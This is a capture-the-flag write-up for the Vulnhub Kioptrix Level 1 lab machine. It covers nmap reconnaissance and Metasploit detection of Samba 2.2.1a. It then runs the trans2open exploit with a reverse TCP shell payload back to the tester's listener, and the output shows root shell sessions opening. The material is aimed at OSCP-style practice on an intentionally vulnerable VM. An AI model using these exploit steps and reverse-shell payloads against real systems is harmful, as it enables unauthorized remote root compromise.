Vulnhub Koptrix Level 1 (OSCP like machines) writeup is here for those looking to root this machine.
CTFs are fun and great learning, today we are solving a very simple CTF called Koptrix Level 1, the machine can be downloaded from – This Link. As I saw the machine to be beginner level and part of many lists for OSCP like machines, here we have a detailed writeup.
__ __ _ _ _ ____ _____ _____ \ \ / / _| |_ __ | |__ _ _| |__ / ___|_ _| ___| \ \ / / | | | | '_ \| '_ \| | | | '_ \ _____| | | | | |_ \ V /| |_| | | | | | | | | |_| | |_) |_____| |___ | | | _| \_/ \__,_|_|_| |_|_| |_|\__,_|_.__/ \____| |_| |_| _ __ _ _ _ | |/ /___ _ __ | |_ _ __(_)_ __ / | | ' // _ \| '_ \| __| '__| \ \/ /____| | | . \ (_) | |_) | |_| | | |> <_____| | |_|\_\___/| .__/ \__|_| |_/_/\_\ |_| |_| ┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1] └─$
I am adding machine IP to hosts file and later I will refer it as machine name instead of IP everywhere (almost) as koptrix_1.vulnhub
┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1] └─$ sudo gedit /etc/hosts
I am running a simple nmap scan and one with few options to get the ports and service details.
┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1] └─$ nmap koptrix_1.vulnhub Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 13:22 IST Nmap scan report for koptrix_1.vulnhub (192.168.252.129) Host is up (0.0094s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 443/tcp open https 32768/tcp open filenet-tms Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds ┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1] └─$
┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1] └─$ sudo nmap -sV -sC -A -O -T5 -p- koptrix_1.vulnhub -oA koptrix1 -vv Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 11:57 IST NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 11:57 Completed NSE at 11:57, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 11:57 Completed NSE at 11:57, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 11:57 Completed NSE at 11:57, 0.00s elapsed Initiating ARP Ping Scan at 11:57 Scanning koptrix_1.vulnhub (192.168.252.129) [1 port] Completed ARP Ping Scan at 11:57, 0.06s elapsed (1 total hosts) Initiating SYN Stealth Scan at 11:57 Scanning koptrix_1.vulnhub (192.168.252.129) [65535 ports] Discovered open port 111/tcp on 192.168.252.129 Discovered open port 139/tcp on 192.168.252.129 Discovered open port 22/tcp on 192.168.252.129 Discovered open port 443/tcp on 192.168.252.129 Discovered open port 80/tcp on 192.168.252.129 Discovered open port 32768/tcp on 192.168.252.129 Completed SYN Stealth Scan at 11:57, 6.05s elapsed (65535 total ports) Initiating Service scan at 11:57 Scanning 6 services on koptrix_1.vulnhub (192.168.252.129) Completed Service scan at 11:57, 6.07s elapsed (6 services on 1 host) Initiating OS detection (try #1) against koptrix_1.vulnhub (192.168.252.129) NSE: Script scanning 192.168.252.129. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 11:57 NSE Timing: About 99.88% done; ETC: 11:58 (0:00:00 remaining) Completed NSE at 11:58, 50.75s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 11:58 Completed NSE at 11:58, 0.30s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 11:58 Completed NSE at 11:58, 0.01s elapsed Nmap scan report for koptrix_1.vulnhub (192.168.252.129) Host is up, received arp-response (0.0020s latency). Scanned at 2021-05-26 11:57:21 IST for 65s Not shown: 65529 closed ports Reason: 65529 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 2.9p2 (protocol 1.99) | ssh-hostkey: | 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1) | 1024 35 109482092953601530927446985143812377560925655194254170270380314520841776849335628258408994190413716152105684423280369467219093526740118507720167655934779634416983599247086840099503203800281526143567271862466057363705861760702664279290804439502645034586412570490614431533437479630834594344497670338190191879537 | 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAKtycvxuV/e7s2cN74HyTZXHXiBrwyiZe/PKT/inuT5NDSQTPsGiyJZU4gefPAsYKSw5wLe28TDlZWHAdXpNdwyn4QrFQBjwFR+8WbFiAZBoWlSfQPR2RQW8i32Y2P2V79p4mu742HtWBz0hTjkd9qL5j8KCUPDfY9hzDuViWy7PAAAAFQCY9bvq+5rs1OpY5/DGsGx0k6CqGwAAAIBVpBtIHbhvoQdN0WPe8d6OzTTFvdNRa8pWKzV1Hpw+e3qsC4LYHAy1NoeaqK8uJP9203MEkxrd2OoBJKn/8EXlKAco7vC1dr/QWae+NEkI1a38x0Ml545vHAGFaVUWkffHekjhR476Uq4N4qeLfFp5B+v+9flLxYVYsY/ymJKpNgAAAIEApyjrqjgX0AE4fSBFntGFWM3j5M3lc5jw/0qufXlHJu8sZG0FRf9wTI6HlJHHsIKHA7FZ33vGLq3TRmvZucJZ0l55fV2ASS9uvQRE+c8P6w72YCzgJN7v4hYXxnY4RiWvINjW/F6ApQEUJc742i6Fn54FEYAIy5goatGFMwpVq3Q= | 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA) |_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvv8UUWsrO7+VCG/rTWY72jElft4WXfXGWybh141E8XnWxMCu+R1qdocxhh+4Clz8wO9beuZzG1rjlAD+XHiR3j2P+sw6UODeyBkuP24a+7V8P5nu9ksKD1fA83RyelgSgRJNQgPfFU3gngNno1yN6ossqkcMQTI1CY5nF6iYePs= |_sshv1: Server supports SSHv1 80/tcp open http syn-ack ttl 64 Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: | Supported Methods: GET HEAD OPTIONS TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux 111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 32768/tcp status |_ 100024 1 32768/udp status 139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: 400 Bad Request | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/emailAddress=root@localhost.localdomain/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit | Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/emailAddress=root@localhost.localdomain/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: md5WithRSAEncryption | Not valid before: 2009-09-26T09:32:06 | Not valid after: 2010-09-26T09:32:06 | MD5: 78ce 5293 4723 e7fe c28d 74ab 42d7 02f1 | SHA-1: 9c42 91c3 bed2 a95b 983d 10ac f766 ecb9 8766 1d33 | -----BEGIN CERTIFICATE----- | MIIEDDCCA3WgAwIBAgIBADANBgkqhkiG9w0BAQQFADCBuzELMAkGA1UEBhMCLS0x | EjAQBgNVBAgTCVNvbWVTdGF0ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoT | EFNvbWVPcmdhbml6YXRpb24xHzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVu | aXQxHjAcBgNVBAMTFWxvY2FsaG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJ | ARYacm9vdEBsb2NhbGhvc3QubG9jYWxkb21haW4wHhcNMDkwOTI2MDkzMjA2WhcN | MTAwOTI2MDkzMjA2WjCBuzELMAkGA1UEBhMCLS0xEjAQBgNVBAgTCVNvbWVTdGF0 | ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoTEFNvbWVPcmdhbml6YXRpb24x | HzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVuaXQxHjAcBgNVBAMTFWxvY2Fs | aG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJARYacm9vdEBsb2NhbGhvc3Qu | bG9jYWxkb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM4BXiK5bWlS | ob4B6a9ALmKDbSxqoMcM3pvGHscFsJs+fHHn+CjU1DX44LPDNOwwOl6Uqb+GtZJv | 6juVetDwcTbbocC2BM+6x6gyV/H6aYuCssCwrOuVKWp7l9xVpadjITUmhh+uB81q | yqopt//Z4THww7SezLJQXi1+Grmp3iFDAgMBAAGjggEcMIIBGDAdBgNVHQ4EFgQU | 7OdRS0NrbNB8gE9qUjcw8LF8xKAwgegGA1UdIwSB4DCB3YAU7OdRS0NrbNB8gE9q | Ujcw8LF8xKChgcGkgb4wgbsxCzAJBgNVBAYTAi0tMRIwEAYDVQQIEwlTb21lU3Rh | dGUxETAPBgNVBAcTCFNvbWVDaXR5MRkwFwYDVQQKExBTb21lT3JnYW5pemF0aW9u | MR8wHQYDVQQLExZTb21lT3JnYW5pemF0aW9uYWxVbml0MR4wHAYDVQQDExVsb2Nh | bGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0BCQEWGnJvb3RAbG9jYWxob3N0 | LmxvY2FsZG9tYWluggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEA | Vgrmpprfkmd8vy0E0UmZvWdIcDrIYRvUWcwSFwc6bGqJeJr0CYSB+jDQzA6Cu7nt | xjrlXxEjHFBBbF4iEMJDnuQTFGvICQIcrqJoH3lqAO73u4TeBDjhv5n+h+S37CHd | 1lvgRgoOay9dWaLKOyUThgKF2HcPWMZIj2froo5eihM= |_-----END CERTIFICATE----- |_ssl-date: 2021-05-26T06:30:19+00:00; +1m53s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 |_ SSL2_RC4_128_WITH_MD5 32768/tcp open status syn-ack ttl 64 1 (RPC #100024) MAC Address: 00:0C:29:6E:20:7E (VMware) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=5/26%OT=22%CT=1%CU=34633%PV=Y%DS=1%DC=D%G=N%M=000C29%T OS:M=60ADEA8A%P=x86_64-pc-linux-gnu)SEQ(SP=C9%GCD=1%ISR=D0%TI=Z%CI=Z%II=I%T OS:S=7)OPS(O1=M5B4ST11NW0%O2=M5B4ST11NW0%O3=M5B4NNT11NW0%O4=M5B4ST11NW0%O5= OS:M5B4ST11NW0%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1 OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11 OS:NW0%RD=0%Q=)T4(R=Y%DF=Y%T=FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=FF OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q OS:=)T7(R=Y%DF=Y%T=FF%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=FF%IPL=164 OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=FF%CD=S) Uptime guess: 0.004 days (since Wed May 26 11:52:14 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=201 (Good luck!) IP ID Sequence Generation: All zeros Host script results: |_clock-skew: 1m52s | nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | KIOPTRIX<00> Flags: <unique><active> | KIOPTRIX<03> Flags: <unique><active> | KIOPTRIX<20> Flags: <unique><active> | MYGROUP<00> Flags: <group><active> | MYGROUP<1e> Flags: <group><active> | Statistics: | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 40101/tcp): CLEAN (Couldn't connect) | Check 2 (port 30957/tcp): CLEAN (Couldn't connect) | Check 3 (port 35852/udp): CLEAN (Failed to receive data) | Check 4 (port 14853/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_smb2-security-mode: Couldn't establish a SMBv2 connection. |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE HOP RTT ADDRESS 1 1.97 ms koptrix_1.vulnhub (192.168.252.129) NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 11:58 Completed NSE at 11:58, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 11:58 Completed NSE at 11:58, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 11:58 Completed NSE at 11:58, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 65.18 seconds Raw packets sent: 65555 (2.885MB) | Rcvd: 65551 (2.623MB) ┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1] └─$
There are few very interesting entries like apache/mod_ssl version on port 80, smb on 139. Lets check smb further
Getting SMB Version of the machine using Metasploit, first fire-up the Metasploit and run the auxiliary/scanner/smb/smb_version
┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1] └─$ msfconsole ____________ [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%] [% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%] [% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%] [% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] =[ metasploit v6.0.45-dev ] + -- --=[ 2134 exploits - 1139 auxiliary - 364 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ] Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search msf6 > use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) > options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' THREADS 1 yes The number of concurrent threads (max one per host) msf6 auxiliary(scanner/smb/smb_version) > set rhosts koptrix_1.vulnhub rhosts => koptrix_1.vulnhub msf6 auxiliary(scanner/smb/smb_version) > run [*] 192.168.252.129:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 192.168.252.129:139 - Host could not be identified: Unix (Samba 2.2.1a) [*] koptrix_1.vulnhub: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/smb/smb_version) >
So we now know the SMB Version running is 2.2.1a, we will search exploits for the same using searchsploit or just search even in metasploit.
msf6 auxiliary(scanner/smb/smb_version) > search samba 2.2 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow 1 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) 2 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) 3 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) 4 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/trans2open msf6 auxiliary(scanner/smb/smb_version) >
So we have some exploits and SMB 2.2 , lets also do same with trans2open .
Lets set payload and options.
msf6 auxiliary(scanner/smb/smb_version) > search trans2open Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) 1 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) 2 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) 3 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) Interact with a module by name or index. For example info 3, use 3 or use exploit/solaris/samba/trans2open msf6 auxiliary(scanner/smb/smb_version) > use exploit/linux/samba/trans2open [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/samba/trans2open) > search samba 2.2 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow 1 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) 2 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) 3 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) 4 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/trans2open msf6 exploit(linux/samba/trans2open) > use exploit/linux/samba/trans2open [*] Using configured payload linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/samba/trans2open) >
We have to configure options
for the exploit, check existing options by typing options and set remote host ( rhosts
) by set rhosts koptrix_1.vulnhub
msf6 exploit(linux/samba/trans2open) > show options Module options (exploit/linux/samba/trans2open): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 139 yes The target port (TCP) Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.252.130 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Samba 2.2.x - Bruteforce msf6 exploit(linux/samba/trans2open) > set rhosts koptrix_1.vulnhub rhosts => koptrix_1.vulnhub msf6 exploit(linux/samba/trans2open) > options Module options (exploit/linux/samba/trans2open): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS koptrix_1.vulnhub yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 139 yes The target port (TCP) Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.252.130 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Samba 2.2.x - Bruteforce msf6 exploit(linux/samba/trans2open) >
Use appropriate payload for successful exploitation , we can see by show payloads
, and use appropriate payload.
msf6 exploit(linux/samba/trans2open) > show payloads Compatible Payloads =================== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 payload/generic/custom normal No Custom Payload 1 payload/generic/debug_trap normal No Generic x86 Debug Trap 2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline 3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline 4 payload/generic/tight_loop normal No Generic x86 Tight Loop 5 payload/linux/x86/adduser normal No Linux Add User 6 payload/linux/x86/chmod normal No Linux Chmod 7 payload/linux/x86/exec normal No Linux Execute Command 8 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86) 9 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86) 10 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager 11 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86) 12 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86) 13 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6) 14 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager 15 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager 16 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager 17 payload/linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP 18 payload/linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline 19 payload/linux/x86/read_file normal No Linux Read File 20 payload/linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) 21 payload/linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) 22 payload/linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager 23 payload/linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86) 24 payload/linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) 25 payload/linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6) 26 payload/linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager 27 payload/linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager 28 payload/linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager 29 payload/linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6) 30 payload/linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline 31 payload/linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline 32 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline 33 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6) [-] The value specified for payload is not valid. msf6 exploit(linux/samba/trans2open) > set payload payload/linux/x86/shell_reverse_tcp payload => linux/x86/shell_reverse_tcp msf6 exploit(linux/samba/trans2open) >
We check the options are set for the payload or not by options or show options , we can see by default the payoad is configured to execute /bin/sh.
msf6 exploit(linux/samba/trans2open) > show options Module options (exploit/linux/samba/trans2open): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS koptrix_1.vulnhub yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 139 yes The target port (TCP) Payload options (linux/x86/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CMD /bin/sh yes The command string to execute LHOST 192.168.252.130 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Samba 2.2.x - Bruteforce msf6 exploit(linux/samba/trans2open) >
now lets run
/ exploit
.
msf6 exploit(linux/samba/trans2open) > run [*] Started reverse TCP handler on 192.168.252.130:4444 [*] 192.168.252.129:139 - Trying return address 0xbffffdfc... [*] 192.168.252.129:139 - Trying return address 0xbffffcfc... [*] 192.168.252.129:139 - Trying return address 0xbffffbfc... [*] 192.168.252.129:139 - Trying return address 0xbffffafc... [*] 192.168.252.129:139 - Trying return address 0xbffff9fc... [*] 192.168.252.129:139 - Trying return address 0xbffff8fc... [*] Command shell session 1 opened (192.168.252.130:4444 -> 192.168.252.129:32779) at 2021-05-26 12:54:25 +0530 [*] Command shell session 2 opened (192.168.252.130:4444 -> 192.168.252.129:32780) at 2021-05-26 12:54:26 +0530 [*] Command shell session 3 opened (192.168.252.130:4444 -> 192.168.252.129:32781) at 2021-05-26 12:54:28 +0530 whoami root ls pwd /tmp cd .. ls bin boot dev etc home initrd lib lost+found misc mnt opt proc root sbin tmp usr var
So we are root now on Koptrix_1 as is evident by whoami
.